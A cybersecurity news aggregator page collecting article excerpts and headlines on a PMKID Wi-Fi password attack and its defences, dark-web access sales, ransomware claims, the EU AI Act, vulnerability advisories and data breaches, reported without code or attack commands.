Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for How Wi-Fi WPA2 is ha ...

 Privacy

Being concerned about the security of your wireless network is not as paranoid as some may think it is. Many routers have a setting enabled by default that makes your WPA/WPA2-protected Wi-Fi network rather vulnerable. In this post, well discuss one of the most effective methods of hacking wireless networks that   show more ...

exploits this setting, and how to protect against it. The simplest and most effective attack on WPA/WPA2-PSK: PMKID interception PMKID interception is the most effective, easy-to-execute, and completely undetectable method of attacking wireless networks protected by the WPA/WPA2 standards. In essence, this attack involves intercepting the encrypted Wi-Fi passwords that wireless routers broadcast constantly — even when no devices are connected to them. Having obtained the encrypted password, the attacker can use the brute-force method to decrypt it — and thereby connect to the Wi-Fi network. This attack can also be carried out on a large scale using a technique called wardriving. Here, the attacker drives around a city scanning all available wireless networks and intercepting encrypted passwords that are broadcast by routers. Not much equipment is required for this — just a laptop, a long-range Wi-Fi adapter, and a powerful antenna. The intercepted encrypted passwords can be cracked on the go. But an attacker may prefer to wait until theyre home and enter all the garnered passwords into a password-cracking tool on a high-performance computer (or rent computing power in the cloud). The effectiveness of this attack was recently demonstrated in Hanoi: a Vietnamese hacker scanned around 10,000 wireless networks and managed to decrypt the passwords for half of them. This is all you need to hack 5000 wireless networks using PMKID interception. Source How is it even possible to hack Wi-Fi using PMKID interception? So why do wireless routers broadcast their Wi-Fi password all the time, albeit in encrypted form? Well, this is a basic function of the 802.11r standard, which is implemented on most routers and usually enabled by default. This standard enables fast roaming in Wi-Fi networks using multiple access points. To speed up the reconnection of the client device to new access points, they constantly broadcast their identifier — the very same PMKID. This identifier is a derivative of the Pairwise Master Key (PMK). More precisely, it contains the result of an SHA-1 hash function calculation, whose source data includes the PMK key and some additional data. The PMK key itself, in turn, is the result of an SHA-1 hash function calculation of the Wi-Fi password. In other words, the PMKID contains the wireless network password, hashed twice. In theory, the hashing process is irreversible, meaning its impossible to recover the original data from the resulting hashed value. Presumably, the creators of the 802.11r standard relied on this when devising the PMKID-based fast roaming mechanism. However, hashed data can be brute-forced. This is made especially straightforward by the fact that people rarely use particularly strong passwords for wireless networks, often relying on fairly predictable combinations of characters instead. The creators of 802.11r obviously didnt take this into account. This problem was discovered a few years ago by the team behind one of the most popular password recovery utilities — in other words, a password-cracking tool — Hashcat. Since then, specialized tools have been developed specifically for cracking intercepted PMKIDs. Successful extraction of the password hashcat! from the intercepted PMKID of a wireless network. Source Thus, in practice, the attacker usually intercepts the PMKID containing the encrypted password, and then uses a dictionary attack — that is, they brute-force the most common passwords, which are collected in a database. How to protect your wireless network from a PMKID attack What can you do to prevent a PMKID interception attack on your wireless network? Fortunately, there are several protective measures that arent too difficult to implement: Create a password for your wireless network that is as long and complex as possible. If a PMKID attacker intercepts the hashed password from your Wi-Fi, they still need to decrypt it afterward, but the more complex the password — the less likely the attackers are to succeed. Therefore, to protect against this attack, create the longest and most unguessable password possible for your wireless network. Disable PMKID transmission in the router settings. Unfortunately, not all routers allow this, but its worth checking if yours has this setting. You can find it by searching for PMKID or 802.11r. Switch to WPA3. If all your devices support this newer Wi-Fi security standard, its worth considering switching to it: WPA3 is generally much more secure than WPA2 and, importantly, isnt susceptible to PMKID interception. Set up a guest network. It can be tedious to have to frequently enter a strong password for the main network on new devices, so set up a guest network with a simpler password. By the way, its also a good idea to transfer potentially insecure things like IoT devices to the guest network. Use the Devices on My Network feature, which is available in our Kaspersky Plus and Kaspersky Premium This feature shows a list of devices on your network and alerts you if a new device connects to it. For additional protection of transmitted data in case someone still manages to hack your Wi-Fi, use a VPN on all your devices to secure the internet connection — for example, our Kaspersky Secure Connection, which is also included in the Kaspersky Plus and Kaspersky Premium subscriptions.

image for Government Websites ...

 Firewall Daily

A threat actor has surfaced on the dark web, announcing the creation of “Hell Paradise,” a covert online platform purportedly dedicated to exploiting vulnerabilities in government websites and accessing sensitive data. The threat actor’s posts mention countries such as the United Arab Emirates,   show more ...

Albania, Armenia, and Angola as among the targets of their activities. The hacker’s message to the Breachforums Community serves as a  manifesto, outlining the features and intentions behind “Hell Paradise.” The platform is described as a repository of vulnerable government sites and associated data, meticulously categorized by country and vulnerability type. With claims of over 1000 susceptible government websites from 49 countries, the hacker presents “Hell Paradise” as a hub of potential exploits, inviting users to explore and exploit the disclosed vulnerabilities. Central to the hacker’s pitch is the classification of vulnerabilities into three distinct categories: Vulnerabilities, Exposed Gits, and Exposed Env files. Of particular concern are the critical and high-severity vulnerabilities highlighted, including Remote Code Execution (RCE), Local File Inclusion (LFI), and SQL injection (SQLi), all of which represent significant security risks if left unaddressed. Source: Twitter Access Restrictions: Imposing Financial Barriers However, access to “Hell Paradise” is not granted freely. The hacker imposes a $50 registration fee, ostensibly to deter spam and curb potential abuse of the platform. By implementing this financial barrier, the operator seeks to mitigate the risk of exploitation while maintaining a semblance of control over access to the disclosed vulnerabilities. Crucially, the hacker assures users that no data will be stored by the platform, with only email addresses required for registration. Despite this claim, the recommendation to use disposable email services like cock.li highlights the clandestine nature of the operation and raises questions about the true intentions behind “Hell Paradise.” The emergence of “Hell Paradise” underlines the evolving cyber threats, particularly concerning the vulnerability in governmental infrastructures worldwide. With malicious actors increasingly targeting critical systems and sensitive data, the potential for widespread disruption and data compromise is a cause for grave concern. Implications of “Hell Paradise”: Potential Security Breaches If the claim of “Hell Paradise” proves to be true, the implications could be severe and far-reaching. Governments and agencies worldwide could face significant security breaches, potentially resulting in the compromise of sensitive data, including classified information, personal records, and even national security secrets. Such breaches could undermine public trust in governmental institutions and lead to diplomatic tensions between affected countries. Moreover, the exploitation of critical vulnerabilities in government websites could result in widespread disruptions to essential services, financial systems, and infrastructure, posing a serious threat to societal stability and economic prosperity. The fallout from such a revelation would necessitate urgent and coordinated efforts from cybersecurity experts and government authorities to assess the extent of the damage, implement mitigation strategies, and prevent future cyber incursions. As the cybersecurity community grapples with the implications of “Hell Paradise,” there is a pressing need for collaboration and vigilance to confront the growing threat posed by cybercriminals and state-sponsored actors alike. Only through proactive measures and coordinated response can we hope to safeguard digital infrastructure and protect against the potentially devastating consequences of cyber exploitation. Stay tuned for further updates as this story continues to unfold, and cybersecurity experts work tirelessly to mitigate the threat posed by “Hell Paradise” and its enigmatic operators. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Dark Web Intrusion: ...

 Firewall Daily

A dark web actor is reportedly selling access to an Indonesian energy company, believed to be the same threat actor who targeted an American manufacturer. The Indonesian company in question, with revenues exceeding millions, found itself at the center of the energy sector threat, according to posts circulating on dark   show more ...

web forums. The initial post, which lacked specific details about the targeted organization, highlighted the substantial revenue of the company, equating to over 65 trillion Indonesian Rupiah or over $417 million. Energy Sector Threat: Access to Unnamed Indonesian Energy Giant  The threat actor offered access to the company’s systems, purportedly through a popular cybersecurity solution used by organizations for network protection. The asking price for this illicit access was set at $800. Source: Daily Dark Web on X This energy sector threat follows a concerning trend of cyberattacks targeting critical infrastructure, particularly in the oil and electricity sectors. Just recently, the same threat actor was observed selling unauthorized access to an American manufacturing company, boasting revenues of $2.7 billion. The access, which included Screenconnect and RDP credentials, was priced at $5,000. Source: Daily Dark Web These energy sector threats highlight the growing sophistication of global threat actors and the increasing vulnerability of essential industries to hackers and ransomware groups. Sangfor Technologies has emphasized the escalating risks posed by cyber-attacks, particularly in sectors reliant on digital systems, such as oil and gas. Cyberattacks on the Oil and Gas Industry The oil and gas industry, in particular, has become a prime target for cybercriminals due to its heavy reliance on technology to manage complex operations. While digital systems offer numerous benefits, including enhanced efficiency and safety, they also present significant cybersecurity challenges. According to Statista, the oil and gas sector ranked fifth among industries most affected by ransomware attacks in 2022, with 21 reported incidents globally. The sector’s reliance on digital systems for extraction, transportation, and refinement processes makes it an attractive target for malicious actors. A report by the US Government Accountability Office highlighted the cybersecurity risks faced by offshore oil and gas infrastructure, citing vulnerabilities in operational technology (OT) systems. These vulnerabilities could potentially allow threat actors to compromise critical functions, posing serious safety and environmental risks. CISA has issued advisories addressing vulnerabilities in operational technology, including concerns related to weak encryption and insecure firmware updates. However, criticism has been directed at regulatory agencies like the US Department of the Interior’s Bureau of Safety and Environmental Enforcement for perceived inadequacies in addressing cybersecurity threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Encina Wastewater Au ...

 Dark Web News

Carlsbad, California – Encina Wastewater Authority (EWA) found itself targeted by the notorious BlackByte ransomware group. The threat actor, known for its aggressive tactics, posted a message on its platform indicating the alleged Encina Wastewater Authority cyberattack. The message hinted at the potential sale   show more ...

of sensitive company documents obtained during the intrusion. Despite the claims made by the BlackByte ransomware group, the website of Encina Wastewater Authority, http://encinajpa.com, remained operational without immediate signs of intrusion. However, cybersecurity experts suggest that the threat actor might have penetrated the organization’s backend systems or databases rather than launching a visible front-end attack like a distributed denial-of-service (DDoS) assault. Decoding the Encina Wastewater Authority Cyberattack  Source: X Encina Wastewater Authority (EWA) in Carlsbad, California, serves over 379,000 residents and businesses across North San Diego County, covering a 125-square-mile area. EWA ensures reliable wastewater treatment, resource recovery, and environmental protection, vital for public health and regional water sustainability. The Cyber Express has reached out to Encina Wastewater Authority for clarification regarding the alleged cyberattack. However, at the time of writing this, no official statement or response has been issued by the organization, leaving the claims of the cyberattack on Encina Wastewater Authority unconfirmed. Source: X Moreover, the threat actor in question, the BlackByte ransomware group, has also shared some sample documents with its claims of the attack. “Company documents, deletion/purchase. If you are interested in purchasing the data or requesting to remove it, Please connect us through our Email”, reads the threat actor’s post.  The Rise of BlackByte Ransomware Group The BlackByte ransomware group has been on the radar of cybersecurity agencies since its emergence in July 2021. Notorious for targeting critical infrastructure, BlackByte gained the attention of the Federal Bureau of Investigation (FBI) and the US Secret Service (USS) within its first year of operation.  By November 2021, the ransomware group had already attacked sectors including government facilities, financial institutions, and food and agriculture. Despite efforts to combat BlackByte’s activities, such as the release of a decrypter by Trustwave in October 2021, the ransomware group continued to evolve its tactics. Developers released newer versions of the ransomware, employing multiple encryption keys and cautioning victims against using available decrypters. Currently, BlackByte persists in targeting organizations worldwide, operating on a ransomware-as-a-service (RaaS) model for its affiliates. However, like other ransomware families, BlackByte notably avoids targeting entities based in Russia. As for the Encina Wastewater Authority cyberattack claims, The Cyber Express will be closely monitoring the situation and we’ll update this post once we have more information on the alleged attack or any official statement or response from the organization.  Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Uncovering ShadowSyn ...

 Dark Web News

In the final week of January 2024, CGSI (Cyble Global Sensor Intelligence) uncovered a potential exploitation of an Aiohttp vulnerability by the notorious ShadowSyndicate group (formerly Infra Storm). This vulnerability, identified as CVE-2024-23334, prompted urgent attention within cybersecurity circles due to its   show more ...

critical nature. The Aiohttp vulnerability, affecting versions of aiohttp before 3.9.2, raised concerns as it allowed unauthenticated, remote attackers to breach servers and access sensitive information through directory traversal.  Aiohttp, renowned for its versatility in asynchronous tasks within Python, became a target for exploitation by threat actors due to its widespread usage, with over 43,000 instances detected globally. ShadowSyndicate Group Exploits Aiohttp Vulnerability Source: Cyble Instances of aiohttp were particularly prevalent in countries such as the United States, Germany, and Spain, making them prime targets for malicious actors like the ShadowSyndicate group. Immediate action, such as patching to the latest version, was strongly advised to mitigate the risk posed by this vulnerability. According to Cyble Research and Intelligence Labs (CRIL), the severity of CVE-2024-23334 was highlighted by its high CVSS score of 7.5, indicating the potential for damage if exploited. Source: nvd.nist.gov CGSI’s findings revealed a Proof of Concept (PoC) for the exploit circulating online, accompanied by instructional videos demonstrating its functionality. Shortly after its public availability, CGSI detected multiple scanning attempts aimed at exploiting the vulnerability. Technical Analysis of the Aiohttp Vulnerability Technical analysis revealed that the vulnerability stemmed from aiohttp’s failure to properly validate file paths, particularly when symbolic links were involved. This oversight opened the door to unauthorized access to sensitive files, even in the absence of symbolic links. Source: VirusTotal Further investigation into the scanning attempts led to the attribution of one IP address, 81[.]19[.]136[.]251, to the ShadowSyndicate group. This group, known for its involvement in ransomware operations, posed a significant threat to organizations worldwide. Their history of ransomware incidents, dating back to 2022, highlighted their proficiency in carrying out cyberattacks for financial gain. The incidents involving ShadowSyndicate, ranging from Quantum ransomware to Nokoyawa and ALPHV ransomware campaigns, showcased their adaptability and persistence in the cybercrime domain. Despite no observed attacks utilizing the Aiohttp vulnerability at the time, the scanning attempts by ShadowSyndicate emphasized the potential threat posed by unpatched systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for AI Gets Rules: EU Pa ...

 Firewall Daily

The European Parliament has approved the groundbreaking Artificial Intelligence (AI) Act, signaling a pivotal step towards regulating AI technologies while fostering innovation and safeguarding fundamental rights. The AI Act, negotiated with member states in December 2023, garnered overwhelming support from MEPs, with   show more ...

523 votes in favor, 46 against, and 49 abstentions. At its core, the AI Act aims to safeguard fundamental rights, democracy, the rule of law, and environmental sustainability while propelling Europe to the forefront of AI innovation. Source: Twitter Brando Benifei, co-rapporteur of the Internal Market Committee (S&D, Italy), highlighted the historic nature of the legislation during the plenary debate, stating, “We finally have the world’s first binding law on artificial intelligence, to reduce risks, create opportunities, combat discrimination, and bring transparency. Thanks to Parliament, unacceptable AI practices will be banned in Europe and the rights of workers and citizens will be protected. The AI Office will now be set up to support companies to start complying with the rules before they enter into force. We ensured that human beings and European values are at the very centre of AI’s development.” AI Act: Protecting Rights and Prohibiting Harmful Applications The AI Act is designed to uphold fundamental rights, democracy, the rule of law, and environmental sustainability, particularly in the face of high-risk AI applications. At the same time, it aims to propel Europe to the forefront of AI innovation. By establishing clear obligations based on the potential risks and impacts of AI, the regulation seeks to strike a balance between security and innovation. Apart from this, one of the key provisions of the Artificial Intelligence Act is the prohibition of certain AI applications that pose a threat to citizens’ rights. This includes banning biometric categorization systems based on sensitive characteristics, as well as the untargeted scraping of facial images from the internet or CCTV footage to create facial recognition databases. Additionally, the act forbids emotion recognition in workplaces and schools, social scoring, predictive policing based solely on profiling individuals, and AI that manipulates human behavior or exploits vulnerabilities. Stricter Controls for Law Enforcement The legislation imposes stringent controls on the use of biometric identification systems (RBI) by law enforcement agencies, allowing their deployment only in narrowly defined situations with strict safeguards. For instance, “real-time” RBI can only be utilized under specific conditions, such as limited time and geographic scope, and with prior judicial or administrative authorization. High-risk AI systems, which have the potential to cause significant harm to health, safety, fundamental rights, and democracy, are subject to clear obligations, including risk assessment, transparency, accuracy, and human oversight. While the use of biometric identification systems by law enforcement is restricted, certain exemptions are provided in narrowly defined situations, such as targeted searches for missing persons or preventing terrorist attacks. Strict safeguards, including judicial or administrative authorization, are required for real-time biometric identification systems. High-risk AI systems, identified for their potential harm to health, safety, fundamental rights, and democracy, are subject to clear obligations. These include risk assessment and reduction, transparency, accuracy, and human oversight. Citizens have the right to submit complaints about AI systems affecting their rights and receive explanations for decisions made by such systems. General-purpose AI systems must meet transparency requirements, including compliance with EU copyright law and publishing detailed summaries of training data. More powerful AI models face additional requirements, such as model evaluations and reporting on incidents. Supporting Innovation and SMEs The Artificial Intelligence Act also emphasizes transparency requirements for general-purpose AI (GPAI) systems, ensuring compliance with EU copyright law and detailed summaries of training data. Furthermore, measures to support innovation, such as regulatory sandboxes and real-world testing, will be established at the national level to facilitate the development of innovative AI solutions by SMEs and startups. AI Act: The Path Forward While the regulation undergoes final checks and awaits formal endorsement by the Council, it is anticipated to be adopted before the conclusion of the legislative session. Upon publication in the official Journal, the law will come into effect twenty days later, with full implementation expected within 24 to 36 months. The passage of the Artificial Intelligence Act signifies a direct response to citizens’ proposals from the Conference on the Future of Europe (COFE). It addresses critical concerns such as bolstering competitiveness, ensuring trustworthiness, and fostering digital innovation while upholding fundamental rights and transparency. Dragos Tudorache, co-rapporteur of the Civil Liberties Committee (Renew, Romania), remarked, “The EU has delivered. We have linked the concept of artificial intelligence to the fundamental values that underpin our societies. However, significant work lies ahead beyond the AI Act itself. AI compels us to reassess the social contract at the core of our democracies, our educational paradigms, labor markets, and even the conduct of warfare. The AI Act serves as a cornerstone for a novel governance model centered around technology. Our focus must now shift towards translating this legislation into action.” The approval of the Artificial Intelligence Act signifies a pivotal moment in the EU’s endeavors to regulate AI. It navigates a nuanced path, striving to nurture innovation while safeguarding fundamental rights in an era defined by digital transformation. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Govt., Critical Infrastructure

The Pentagon is set to open its new Office of the Assistant Secretary of Defense for Cyber Policy on March 18. This office is a response to a congressionally mandated effort to elevate the military's focus on cybersecurity.

 Malware and Vulnerabilities

Cisco recently addressed several high-severity vulnerabilities in its IOS RX software. These vulnerabilities include three high-severity issues that can lead to privilege escalation and trigger denial-of-service (DoS) conditions.

 Trends, Reports, Analysis

The Cybercrime Atlas initiative, a collaborative effort involving law enforcement agencies, private-sector firms, and other organizations, aims to disrupt cybercriminals by mapping out relationships between criminal groups and their infrastructure.

 Trends, Reports, Analysis

Cybercriminals are bypassing traditional SIM swapping methods by exploiting vulnerabilities in eSIM activation processes and using stolen credentials to initiate the porting of phone numbers to their own devices.

 Threat Actors

The attack chain involves phishing emails with malicious attachments, the use of curl and Program Compatibility Assistant (PCA) in Windows to deliver and execute malicious payloads, and unauthorized command execution using Impacket.

 Malware and Vulnerabilities

StopCrypt ransomware, also known as STOP Djvu, has evolved with a new multi-stage execution process involving shellcodes to evade security tools. Unlike ransomware operations targeting businesses, StopCrypt primarily targets consumers.

 Malware and Vulnerabilities

Arcserve has addressed critical security vulnerabilities (CVE-2024-0799, CVE-2024-0800) in its Unified Data Protection (UDP) solution, which could be exploited to upload malicious files to the underlying Windows system.

 Breaches and Incidents

The DarkGate malware operation launched a new wave of attacks exploiting a recently patched Windows Defender SmartScreen vulnerability (CVE-2024-21412). Trend Micro analysts have reported that DarkGate operators are leveraging this vulnerability to enhance their malware distribution efforts, targeting traders'   show more ...

systems with the DarkMe malware. Users are urged to apply the required security patches to stay safe from such attacks.

 Incident Response, Learnings

UnitedHealth Group reportedly identified the source of the cyberattack on its subsidiary, Change Healthcare. The company has conducted a forensic analysis and established a safe restore point to move forward with the restoration of data and systems.

 Feed

Ubuntu Security Notice 6694-1 - It was discovered that Expat could be made to consume large amounts of resources. If a user or automated system were tricked into processing specially crafted input, an attacker could possibly use this issue to cause a denial of service.

 Feed

Debian Linux Security Advisory 5632-1 - It was discovered that composer, a dependency manager for the PHP language, processed files in the local working directory. This could lead to local privilege escalation or malicious code execution. Due to a technical issue this email was not sent on 2024-02-26 like it should have.

 Feed

Financials by Coda versions prior to 2023Q4 suffer from an incorrect access control authorization bypass vulnerability. The Change Password feature can be abused in order to modify the password of any user of the application.

 Feed

Ubuntu Security Notice 6695-1 - It was discovered that TeX Live incorrectly handled certain memory operations in the embedded axodraw2 tool. An attacker could possibly use this issue to cause TeX Live to crash, resulting in a denial of service. This issue only affected Ubuntu 20.04 LTS. It was discovered that TeX Live   show more ...

allowed documents to make arbitrary network requests. If a user or automated system were tricked into opening a specially crafted document, a remote attacker could possibly use this issue to exfiltrate sensitive information, or perform other network-related attacks. This issue only affected Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

 Feed

Red Hat Security Advisory 2024-1328-03 - Red Hat Advanced Cluster Management for Kubernetes 2.9.3 General Availability release images, which fix bugs and update container images. Issues addressed include denial of service and traversal vulnerabilities.

 Feed

Red Hat Security Advisory 2024-1327-03 - An update for the gimp:2.8 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.

 Feed

Debian Linux Security Advisory 5640-1 - Two vulnerabilities were discovered in Open vSwitch, a software-based Ethernet virtual switch, which could result in a bypass of OpenFlow rules or denial of service.

 Feed

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

 Firewall Daily

Nissan Motor Corporation and Nissan Financial Services in Australia and New Zealand, collectively known as Nissan Oceania, have started reaching out to individuals affected by a recent cyberattack that targeted its local operations. The organization anticipates formally notifying approximately 100,000 individuals   show more ...

about the Nissan cyberattack in the coming weeks, although this number may be subject to adjustments as contact details are verified and duplicate entries are removed. Acknowledging the distress and concern Nissan cyberattack may cause, the company extends its sincere apologies to the affected community. The company is committed to promptly informing affected individuals about the specific information compromised, the support available to them, and steps they can take to mitigate risks such as identity theft, scams, or fraud. “We know this will be difficult news for people to receive, and we sincerely apologize to our community for any concerns or distress it may cause. We are committed to contacting affected individuals as soon as possible to tell them what information was involved, how we are supporting them, and the steps they can take to protect themselves against the risk of harm, identity theft, scams, or fraud,” reads Nissan’s Official Statement. Identifying Affected Stakeholders in the Nissan Cyberattack The scope of those affected encompasses a range of stakeholders, including Nissan customers (including customers of Mitsubishi, Renault, Skyline, Infiniti, LDV, and RAM branded finance businesses), dealers, as well as current and former employees. “The fact that around 10,000 were believed to have had seriously critical PII data stolen, such as driving licenses and Medicare cards, as a result of the Nissan cyberattack, is really quite concerning. The perpetrators of this attack managed to steal confidential data and will surely try to blackmail the victims endlessly for extortion purposes,” said Darren Williams, CEO and Founder of Blackfog. “They were able to evade the security tools at the front door and remain hidden in the system of a multinational global brand for months, highlighting the sophistication of today’s cybercriminals. To really reduce the chance of data breaches, organizations need to look beyond perimeter defense and focus on securing the back door with anti data exfiltration solutions,” Williams added further. The Nissan cyberattack, which occurred on December 5, 2023, involved a malicious third party gaining unauthorized access to the company’s local IT servers. The compromised data varies for each individual, with initial estimates suggesting that up to 10% of those notified have had some form of government identification compromised. This includes approximately 4,000 Medicare cards, 7,500 driver’s licenses, 220 passports, and 1,300 tax file numbers. For the remaining 90% of individuals, other personal information such as loan-related transaction statements, employment or salary details, and dates of birth have been impacted. Support Measures Implemented Immediate actions were taken by the organization to contain the Nissan cyberattack, followed by prompt notifications to relevant government authorities, including the Australian and New Zealand national cyber security centers and privacy regulators. Since the discovery of the cyber incident, Nissan has been collaborating closely with government agencies and external cyber forensic experts to assess the compromised data and understand its impact on individuals within the community. Nissan has implemented several measures to assist affected individuals, including partnerships with reputable organizations such as IDCARE, Australia and New Zealand’s national identity and cyber support community service. IDCARE will provide expert guidance and support to impacted individuals, addressing concerns about potential misuse of personal information. Additionally, free credit monitoring services will be provided through Equifax in Australia and Centrix in New Zealand to help individuals detect any fraudulent activity. Nissan will also reimburse the costs associated with replacing primary identity documents where advised by the relevant government agency. To further support affected individuals, Nissan has established dedicated customer support lines in Australia and New Zealand, operational on weekdays from 7 am to 7 pm AEDT. These lines will provide assistance to those who have received notifications regarding the breach. In addition to the support measures outlined, Nissan advises affected individuals to remain vigilant against potential threats by avoiding suspicious online activity, refraining from clicking on unfamiliar links or opening suspicious emails, and verifying the authenticity of communications received. It is recommended to update passwords regularly, use strong and unique passwords for different accounts, enable multi-factor authentication where available, and report any suspicious activities to relevant authorities. Nissan remains committed to transparency and proactive engagement as it navigates through the aftermath of this cyber incident, prioritizing the welfare and security of its customers, partners, and employees. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Feed

Chinese users looking for legitimate software such as Notepad++ and VNote on search engines like Baidu are being targeted with malicious ads and bogus links to distribute trojanized versions of the software and ultimately deploy Geacon, a Golang-based implementation of Cobalt Strike. “The malicious site found in the notepad++ search is distributed through an advertisement block,” Kaspersky

 Feed

Google on Thursday announced an enhanced version of Safe Browsing to provide real-time, privacy-preserving URL protection and safeguard users from visiting potentially malicious sites. “The Standard protection mode for Chrome on desktop and iOS will check sites against Google’s server-side list of known bad sites in real-time,” Google’s Jonathan Li and Jasika Bawa said. “If we

 Feed

Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT could act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data. According to new research published by Salt Labs, security flaws found directly in ChatGPT and within the ecosystem could allow attackers to install malicious plugins without users' consent

 Feed

A group of researchers has discovered a new data leakage attack impacting modern CPU architectures supporting speculative execution. Dubbed GhostRace (CVE-2024-2193), it is a variation of the transient execution CPU vulnerability known as Spectre v1 (CVE-2017-5753). The approach combines speculative execution and race conditions. "All the common synchronization primitives implemented

 Cyber Security News

Source: www.cybertalk.org – Author: slandau EXECUTIVE SUMMARY: As the backbone of modern container orchestration, Kubernetes plays a pivotal role in managing workloads across clusters. However, recent research has shed light on a critical vulnerability that demands attention from security practitioners. In this   show more ...

article, we delve into the specifics of the flaw and provide practical steps […] La entrada Securing Kubernetes: mitigating the RCE flaw for Windows nodes – Source: www.cybertalk.org se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: securelist.com – Author: Oxana Andreeva, Kaspersky Security Services To help companies with navigating the world of web application vulnerabilities and securing their own web applications, the Open Web Application Security Project (OWASP) online community created the OWASP Top Ten. As we followed their   show more ...

rankings, we noticed that the way we ranked major vulnerabilities was […] La entrada Top 10 web application vulnerabilities in 2021–2023 – Source: securelist.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.theguardian.com – Author: Presented by Nosheen Iqbal with Alex Hern and Jon DiMaggio; produced by Ned Carter Miles; executive editor Homa Khaleeli A ransomware site on the dark web has allowed criminals to extort hospitals, businesses and schools for years. By encrypting data or threatening to post   show more ...

data online, hackers have cost companies millions […] La entrada How an infamous ransomware gang found itself hacked – podcast – Source: www.theguardian.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas A new variant of StopCrypt ransomware (aka STOP) was spotted in the wild, employing a multi-stage execution process that involves shellcodes to evade security tools. StopCrypt, also known as STOP Djvu, is the most widely distributed ransomware in existence   show more ...

that you rarely hear about. While you constantly hear how […] La entrada StopCrypt: Most widely distributed ransomware now evades detection – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas SIM swappers have adapted their attacks to steal a target’s phone number by porting it into a new eSIM card, a digital SIM stored in a rewritable chip present on many recent smartphone models. Embedded Subscriber Identity Modules (eSIMs) are digital   show more ...

cards stored on the chip of the mobile […] La entrada SIM swappers hijacking phone numbers in eSIM attacks – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Tech support companies Restoro and Reimage will pay $26 million to settle charges that they used scare tactics to trick their customers into paying for unnecessary computer repair services. The U.S. Federal Trade Commission imposed the fine in response to   show more ...

the two Cyprus-based firms’ deceptive marketing, which violates the […] La entrada Tech support firms Restoro, Reimage fined $26 million for scare tactics – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Google will roll out a Safe Browsing update later this month that will provide real-time malware and phishing protection to all Chrome users, without compromising their browsing privacy. The company launched Safe Browsing in 2005 to defend users against   show more ...

web phishing attacks and has since upgraded it to block […] La entrada Google Chrome gets real-time phishing protection later this month – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas France Travail, formerly known as Pôle Emploi, is warning that hackers breached its systems and may leak or exploit personal details of an estimated 43 million individuals. France Travail is the French governmental agency responsible for registering   show more ...

unemployed individuals, providing financial aid, and assisting them in finding jobs. Yesterday, […] La entrada French unemployment agency data breach impacts 43 million people – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas Nissan Oceania is warning of a data breach impacting 100,000 people after suffering a cyberattack in December 2023 that was claimed by the Akira ransomware operation. In early December, the Japanese automaker’s regional division covering distribution,   show more ...

marketing, sales, and services in Australia and New Zealand announced it was investigating a […] La entrada Nissan confirms ransomware attack exposed data of 100,000 people – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Microsoft will soon provide a single Teams Windows and macOS app for all account types, allowing users to switch between work, school, or personal profiles with just a couple of mouse clicks. The company says the new unified Teams application will be made   show more ...

available to commercial customers in April […] La entrada Windows 11 gets single Teams app for work and personal accounts – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas A new wave of attacks by the DarkGate malware operation exploits a now-fixed Windows Defender SmartScreen vulnerability to bypass security checks and automatically install fake software installers. SmartScreen is a Windows security feature that displays a   show more ...

warning when users attempt to run unrecognized or suspicious files downloaded from the […] La entrada Hackers exploit Windows SmartScreen flaw to drop DarkGate malware – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

